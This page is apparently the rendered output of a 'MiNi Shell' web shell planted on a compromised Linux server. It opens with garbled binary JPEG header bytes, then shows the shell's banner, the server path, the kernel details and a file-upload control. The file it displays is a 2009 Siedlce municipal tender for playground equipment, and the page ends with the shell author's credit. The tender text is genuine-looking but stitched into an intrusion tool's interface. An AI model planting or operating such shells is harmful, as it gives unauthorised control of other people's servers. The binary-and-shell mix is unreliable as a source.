JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090723/251554-N-2009.html

<p class="kh_header"><b>Siedlce: Dostawa i montaż urządzeń zabawowych na place zabaw na terenie Miasta Siedlce</b><br>
<b>Numer ogłoszenia: 251554 - 2009; data zamieszczenia: 23.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Siedlce , Skwer Niepodległości 2, 08-110 Siedlce, woj. mazowieckie, tel. 025 6430785, faks 025 6430718.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siedlce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż urządzeń zabawowych na place zabaw na terenie Miasta Siedlce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa urządzeń zabawowych wraz z ich montażem na terenie miasta  Siedlce. 
2.Zamówienie obejmuje dostawę i montaż urządzeń zabawowych w następujących miejscach:
a) plac zabaw znajdujący się  pomiędzy ulicami:  Grabianowską, Miłą, Składową i Żwirową,
b) plac zabaw znajdujący się pomiędzy ulicami: Stanisława Moniuszki, Karola Szymanowskiego, Henryka Wieniawskiego. 
3.Termin realizacji zamówienia, to jest dostawy wraz z montażem urządzeń: do 30 dni od dnia  podpisania umowy.
4.Szczegółowe warunki wykonania zadania:
a) Teren przy ul. Grabianowskiej, Miłej,Składowej,Żwirowej:
- zestaw zabawowy składający się z: co najmniej dwóch wież, co najmniej jednej zjeżdżalni, co najmniej jednego pomostu i co najmniej jednej ścianki wspinaczkowej - 1 szt. 
- huśtawka  na sprężynach - siedzenia gumowane lub ze sklejki (różne modele) - 3  szt. 
- huśtawka wagowa pojedyncza (tj. 2 siedzenia) - 1 szt. 
- huśtawka podwójna dla małych dzieci (z siedzeniami fotelikami) - 1 szt. 
- huśtawka podwójna z siedzeniami dla starszych dzieci - 1 szt. 
- regulamin placu zabaw (format co najmniej A3) umieszczony na wysokości co najmniej 1,8 m - 1 szt. 
- piaskownica o wymiarach 3 x 4 m (wskazane, aby była przykrywana) - 1 szt. 
- przeplotnia (długości do 2,5 m i wysokości do 1,8 m) - 1 szt. 
- urządzenie - huśtawka kładką zawieszoną na łańcuchach - kilkuosobowa - 1 szt. 
- karuzela z platformą z blachy z  siedziskami plastikowymi lub ze sklejki - 1 szt. 
- zestaw do ćwiczeń gimnastycznych - składający się z co najmniej jednej drabinki, co najmniej jednej ścianki wspinaczkowej, liny wspinaczkowej, rury wspinaczkowej - 1 szt. 
- urządzenie rekreacyjne, tj.  ławeczki dla młodszych dzieci (z  daszkiem)  - 1 szt. 
- zjeżdżalnia pojedyncza - 1 szt.
- karuzela z czterema siedziskami - 1 szt.
b) teren na osiedlu mieszkaniowym przy ul. Stanisława Moniuszki, Karola Szymanowskiego, Henryka  Wieniawskiego: 
- zestaw zabawowy składający się z: co najmniej dwóch wież, co najmniej jednej zjeżdżalni, co najmniej jednego pomostu - 1 szt.
- huśtawka z dwoma siedzeniami - jedno siedzenie - w formie fotelika (dla młodszych dzieci) i jedno siedzenie dla dzieci starszych - 1 szt. 
- piaskownica - o wymiarach co najmniej 2 x 3 m (wskazane, aby była przykrywana)  - 1 szt. 
- huśtawka wagowa pojedyncza (siedzenia gumowane lub ze sklejki) - 1 szt. 
Dostawa urządzeń obejmuje również prefabrykaty niezbędne do montażu oraz koszty ich transportu. 
Wymagania dotyczące urządzeń: fabrycznie nowe, elementy metalowe - ze stali nierdzewnej, malowane proszkowo lub lakierem akrylowym lub ocynkowane, zjeżdżalnie - ze stali nierdzewnej,  łańcuchy i śruby łączące elementy wykonane ze stali nierdzewnej lub ocynkowane, urządzenia muszą posiadać aktualne certyfikaty upoważniające do oznaczania wyrobu znakiem bezpieczeństwa (wymagane przed odbiorem końcowym zamówienia). Wymagania dodatkowe: - prace związane z montażem urządzeń należy wykonać zgodnie z instrukcją producenta urządzeń, wszystkie urządzenia mają być zamontowane  na placach zabaw z zachowaniem stref bezpieczeństwa. W strefie bezpieczeństwa nie wolno umieszczać żadnych przedmiotów, innych urządzeń, ławek itp. Strefy bezpieczeństwa muszą być wydzielone wokół danego urządzenia oraz pomiędzy poszczególnymi urządzeniami zabawowymi, do montowanych urządzeń zabawowych należy dołączyć instrukcje ich obsługi, przeglądów i konserwacji  (wymagane przed odbiorem końcowym zamówienia). Wykonawca musi posiadać na terenie Polski własny serwis i autoryzację producenta urządzeń jeśli sam ich nie wykonał. Wykonawca udzieli co najmniej  36 miesięcy gwarancji na wszystkie dostarczone urządzenia (liczone od dnia pełnego zrealizowania zamówienia potwierdzonego protokołem). 
Wykonawca jest zobowiązany zrealizować zamówienie w taki sposób, aby maksymalnie ograniczyć szkody (np. uszkodzenia terenu) powstałe podczas transportu i instalacji urządzeń. Po zakończeniu prac instalacyjnych Wykonawca jest zobowiązany przywrócić teren do stanu pierwotnego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 37.53.50.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności.
a)Przedstawią aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru   lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed   upływem terminu składania ofert, 
b)Przedstawią aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego  potwierdzające,że wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie  lub  rozłożenie na raty  zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu-wystawione nie wcześniej niż 3 miesiące przed upływem  terminu składania ofert,
c)Przedstawią  aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń  Społecznych  lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające,  że wykonawca nie zalega   z opłacaniem składek  na ubezpieczenie  zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub  rozłożenie na raty  zaległych płatności   lub wstrzymanie w  całości wykonania decyzji właściwego organu - wystawione nie wcześniej   niż 3 miesiące przed upływem terminu składania ofert.
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania  zamówienia. To jest:
a) Wykonali, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania  o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostawy odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że dostawy te wykonane zostały należycie (referencje lub protokóły odbioru prac). W szczególności Zamawiający wymaga aby wykonawca wykonał co najmniej 3 dostawy o charakterze i złożoności porównywalnej z przedmiotem zamówienia  o wartości nie mniejszej niż 20.000 zł. każda.
3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie                 zamówienia. To jest:
a)  Przedstawią informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których posiadają rachunek potwierdzającą  wysokości posiadanych środków finansowych lub zdolność kredytową na kwotę minimum 30.000 zł. wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  wcześniej niż  6 miesięcy przed upływem terminu składania ofert. 
2.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że  wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał  przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty  zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione  nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.
3.Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że  wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne,  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie                       lub  rozłożenie na raty  zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu - wystawione nie wcześniej niż 3 miesiące  przed  upływem  terminu składania ofert.
4.Oświadczenie wykonawcy o spełnianiu warunków  udziału w postępowaniu -  art. 22  i nie podleganiu wykluczeniu z postępowania na podstawie art. 24  ustawy Prawo zamówień publicznych.
5.Wykaz wykonanych dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania              i odbiorców oraz z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie (referencje lub protokóły odbioru prac). W szczególności zamawiający wymaga aby wykonawca wykonał  co najmniej 3 dostawy  o charakterze i złożoności porównywalnej z przedmiotem zamówienia o wartości nie mniejszej niż 20.000 zł. każda.
6.Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek potwierdzająca  wysokości posiadanych środków finansowych lub zdolność kredytową na kwotę minimum 30.000 zł. wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Dokumenty, o których mowa w powyżej należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.siedlce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Referat Zamówień Publicznych Urzędu Miasta Siedlce, 08-110 Siedlce, Skwer Niepodległości 2, pok. nr 3, (cena:  2,16 zł brutto + koszt przesyłki)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2009 godzina 11:45, miejsce: Urząd Miasta Siedlce, Kancelaria Ogólna Urzędu Miasta Siedlce,                                        Skwer  Niepodległości 2, 08-110 Siedlce, pokój Nr 30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com